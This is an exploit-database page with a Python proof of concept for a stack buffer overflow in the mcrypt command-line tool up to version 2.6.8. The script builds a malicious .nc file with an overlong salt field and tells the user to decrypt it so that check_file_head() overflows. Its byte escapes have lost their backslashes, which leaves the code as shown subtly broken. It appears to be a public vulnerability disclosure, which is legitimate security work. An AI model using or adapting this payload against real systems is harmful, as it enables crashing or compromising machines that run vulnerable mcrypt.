[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : mcrypt <= 2.6.8 stack-based buffer overflow poc
# Published : 2012-11-26
# Author :
# Previous Title : Ezhometech EzServer 7.0 Remote Heap Corruption Vulnerability
# Next Title : Cyme ChartFX Client Server ActiveX Control Array Indexing Vulnerability


#!/usr/bin/env python

# mcrypt <= 2.6.8 stack-based buffer overflow poc
# http://mcrypt.sourceforge.net/
# (the command line tool, not the library)
#
# date: 2012-09-04
# exploit author: _ishikawa
# tested on: ubuntu 12.04.1
# tech: it overflows in check_file_head() when decrypting .nc files with too long salt data
#
# shout-outs to all cryptoparty people

import sys

sprawl = 105
gibson = "x00x6dx03x40x73x65x72x70x65x6ex74x00x20x00x63x62"
gibson += "x63x00x6dx63x72x79x70x74x2dx73x68x61x31x00"
gibson += chr(sprawl)
gibson += ("A" * sprawl)
gibson += (chr(0) * 3)

try:
  count0 = open("cyberpunk.nc", "wb")
  count0.write(gibson)
  count0.close()
except IOError:
  print "file error"
  sys.exit(1)

print "now run  mcrypt -d cyberpunk.nc"